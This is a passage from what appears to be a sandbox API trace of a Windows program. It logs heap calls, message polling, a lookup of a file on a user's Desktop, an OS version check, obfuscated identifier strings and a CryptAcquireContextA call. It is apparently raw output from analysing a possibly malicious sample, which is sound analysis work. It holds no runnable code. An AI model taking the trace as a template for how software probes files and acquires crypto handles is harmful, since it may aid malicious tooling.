Size=0x10) returned 0x2aa96a0 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0101.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0101.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0101.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.080] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/i6 iY_C6BkJ.m4a", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 0x9a3b80 [0101.080] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0101.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0101.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0101.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0101.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.081] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0101.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0101.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0101.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0101.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.082] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0101.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0101.082] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.082] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.082] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0101.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.082] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0101.083] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.083] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0101.083] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0101.083] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.083] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0101.083] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0101.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.084] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0101.084] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.084] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.084] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.084] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.084] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0101.085] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0101.085] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0101.085] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0101.085] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0101.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.085] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.085] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.085] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.085] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0101.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0101.085] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.085] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.085] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0101.086] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.086] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0101.086] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0101.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0101.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7200, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0101.086] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf440) returned 1 [0101.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.087] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0101.087] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.087] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0101.087] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.087] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.087] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.087] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0101.087] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.087] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0101.087] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.087] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.087] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.088] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0101.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.088] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0101.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.088] PeekMessageW (in: 